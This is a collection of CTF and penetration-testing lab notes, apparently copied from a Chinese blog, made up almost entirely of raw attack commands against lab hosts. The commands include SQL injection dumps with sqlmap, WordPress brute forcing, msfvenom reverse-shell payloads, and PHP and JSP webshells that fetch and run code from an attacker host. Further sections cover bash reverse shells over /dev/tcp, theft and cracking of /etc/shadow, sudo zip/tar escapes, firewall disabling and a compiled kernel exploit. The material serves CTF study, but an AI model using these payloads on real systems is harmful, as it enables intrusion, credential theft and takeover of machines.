CTF learning materials

These are CTF learning materials. For videos, practice ranges and other learning materials, join QQ group 1031811955.
Single-user mode: press Shift + e, replace "ro recovery nomodeset" with "rw single init=/bin/bash", press Ctrl + x, then run passwd root
Scan the LAN for IP-to-MAC mappings
netdiscover -r 192.168.1.1/24

Free an occupied port
netstat -pantu
netstat -lnp | grep 4444
fuser -v -n tcp 4444
kill -9 2169

ps -A

Restart the network service
/etc/init.d/network restart or /etc/init.d/networking restart

service vsftpd start
/home/uftp

nc -nlvp 4444

Information gathering
nmap -sV 192.168.1.3

nmap -T4 -p- 192.168.1.6

nmap -T4 -Is -v 192.168.1.6

nikto -host http://192.168.1.6

themed http://192.168.1.6

python -c "import pty;pty.spawn('/bin/bash')"

ssh [email protected]
mysql -h 192.168.1.11 -u username_here -p

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.1.8

set username hadi

set threads 5

set pass_file /root/Desktop/common-password/hadi.txt

set verbose true

python -c "import pty;pty.spawn('/bin/bash')"

sqlmap -u "http://192.168.1.8/cat.php?id=4-2" -D "photoblog" --tables

sqlmap -u "http://192.168.1.8/cat.php?id=4-2" -D "photoblog" -T "users" --columns

sqlmap -u "http://192.168.1.8/cat.php?id=4-2" -D "photoblog" -T "users" -C "login,password" --dump

http://192.168.1.9:8080/wordpress/wp-content/themes/twentythirteen/404.php

netdiscover -r 192.168.1.1/24

clear

playsms/index.php?app=main&inc=feature_sendfromfile&op=list

<?php system('uname -a');die(); ?>.php

https://www.exploit-db.com/exploits/42003
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -f elf > /var/www/html/shell
d2dldCBodHRwOi8vMTkyLjE2OC4xLjEwL3MgLU8gL3RtcC9hCg==

<?php system(base64_decode('d2dldCBodHRwOi8vMTkyLjE2OC4xLjEwL3MgLU8gL3RtcC9hCg=='));die(); ?>.php
<?php system(base64_decode('Y2htb2QgNzc3IC90bXAvYQo='));die(); ?>.php
<?php system(base64_decode('L3RtcC9hCg=='));die(); ?>.php

sudo perl -e "exec '/bin/sh'"
bash -i

shellcd.PHP

apt-get install avws

sqlmap -u "http://192.168.1.9" --headers="X-Forwarded-For:*" --dbs --batch

sqlmap -u url --headers="X-Forwarded-For:*" --dbs --batch

sqlmap -u http://192.168.1.9 --headers="X-Forwarded-For:*" -D photoblog --tables --batch

sqlmap -u http://192.168.1.9 --headers="X-Forwarded-For:*" -D photoblog -T users --columns --batch

sqlmap -u http://192.168.1.9 --headers="X-Forwarded-For:*" -D photoblog -T users -C login,password --dump --batch

cd /usr/share/webshells/php
cp php-reverse-shell.php /root/桌面/

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -f raw > /root/Desktop/shell.py

use exploit/multi/handler

set payload python/meterpreter/reverse_tcp

service apache2 start
service apache2 status

sysinfo
shell

http://192.168.1.11/wordpress/wp-content/themes/twentyfifteen/404.php
cat /etc/passwd
knew togie
sudo -l

13. CTF Capture the Flag - directory traversal (gaining www-data user privileges)
http://192.168.1.8/dbadmin/
http://192.168.1.8/dbadmin/test_db.php
OWASP ZAP
http://192.168.1.8 /view.php?page=...%2F...%2F...%2F...%2F...%2F...%2F...%2F...%2F...%2F...%2F...%2F...%2F...%2F...%2F... 2Fetc% 2F% ...% 2Fpasswd
cd /usr/share/webshells/php
cp php-reverse-shell.php /root/Desktop
mv php-reverse-shell.php shell.php

<?php system("cd /tmp; wget http://192.168.1.10:8000/shell.php; chmod +x shell.php; php shell.php");?>

python -m SimpleHTTPServer
nc -nlvp 4444
/usr/databases/shell.php
http://192.168.1.8/view.php?page=…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2Fusr/databases/shell.php
python -c "import pty;pty.spawn('/bin/bash')"

14. Web security - brute force
http://192.168.1.12/secret/wp-login.php
gedit /etc/hosts
http://vtcsec/secret/wp-login.php
wpscan --url 192.168.1.12/secret --enumerate u
wpscan --url http://192.168.1.12/secret --enumerate u
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
set rhosts 192.168.1.12
set pass_file /usr/share/wordlists/dirb/common.txt
set username admin
set targeturi /secret/
run
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -f raw
back
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.10
http://192.168.1.12/secret/wp-content/themes/twentyseventeen/404.php
download /etc/passwd
download /etc/shadow
unshadow passwd shadow > cracked
john cracked
marlinspike
python -c "import pty;pty.spawn('/bin/bash')"
su - marlinspike
sudo -l
sudo bash

15. Path traversal (privilege escalation to root) - web security privilege escalation
uname -a
cat /etc/issue
cat /etc/*-release
cat /etc/passwd
cat /etc/shadow
cat /etc/crontab
sudo
sudo -l
cd /home
cd wordpress
ssh [email protected]
sWfCsfJSPV9H3AmQzw8
touch exploit
sudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"
sudo -u root tar cf2 /dev/null exploit --checkpoint=1 --checkpoint-action="/bin/bash"

16. Web security command
http://192.168.1.12:8080/
http://192.168.1.12:8080/test.jsp

ls -l /tmp
ls -alh /tmp
ls -alh /home
ls -alh /home/bill
uname -a
ssh bill@localhost sudo -l
ssh bill@localhost sudo ufw disable
nc -lvp 444
ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.1.10/444 0>&1
cd /usr/share/webshells/jsp
cp jsp-reverse.jsp /root/桌面/
cd /root/桌面/
python -m SimpleHTTPServer
mv jsp-reverse.jsp webshell.jsp
ssh bill@localhost sudo wget "http://192.168.1.10:8000/webshell.jsp" -O /var/lib/tomcat8/webapps/ROOT/webshell.jsp
ssh bill@localhost sudo chmod 777 /var/lib/tomcat8/webapps/ROOT/webshell.jsp

17. Command execution (using an integrated testing tool)
service network start
ifconfig ens33 192.168.1.11
Install Sparta
git clone https://github.com/secforce/sparta.git /opt/sparta
git clone https://github.com/elixir-lang/elixir.git
apt-get install python-elixir
apt-get install ldap-utils rwho rsh-client x11-apps finger
cd /opt/sparta
./sparta.py

/usr/share/dirbuster/wordlists/directory-list-1.0.txt
http://192.168.1.11/admin/
http://192.168.1.11/dev

cd /opt/
git clone https://github.com/UltimateHackers/Hash-Buster/
cd Hash-Buster
hash-identifier
python hash.py
nc -nlvp 4444
echo 'bash -i >& /dev/tcp/192.168.1.10/4445 0>&1' | bash
sudo su

18. PUT upload vulnerability
curl -v -X OPTIONS http://192.168.1.11/test
Install the RESTClient add-on in Firefox
cp /usr/share/webshells/php/php-reverse-shell.php shell.php

http://192.168.1.3/login.php
@ btrisk.com

23. Integrated test (hard: kernel privilege escalation) - web security, intermediate intrusion
wpscan --url http://192.168.1.6/wordpress --enumerate at --enumerate ap --enumerate u

wpscan --url http://192.168.1.6/wordpress --enumerate u

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 -f raw

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

http://192.168.1.6/wordpress/
http://192.168.1.6/wordpress/wp-admin/
http://192.168.1.6/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentyfourteen&scrollto=0&updated=true
http://192.168.1.6/wordpress/wp-content/themes/twentyfourteen/404.php

searchsploit ubuntu 4.4.0
cd /usr/share/exploitdb/exploits/linux/local/
cp 41458.c /root/桌面
gcc 41458.c -o shellroot
upload /root/桌面/shellroot
chmod 777 shellroot
./shellroot

Origin blog.csdn.net/qw123456789e/article/details/104426716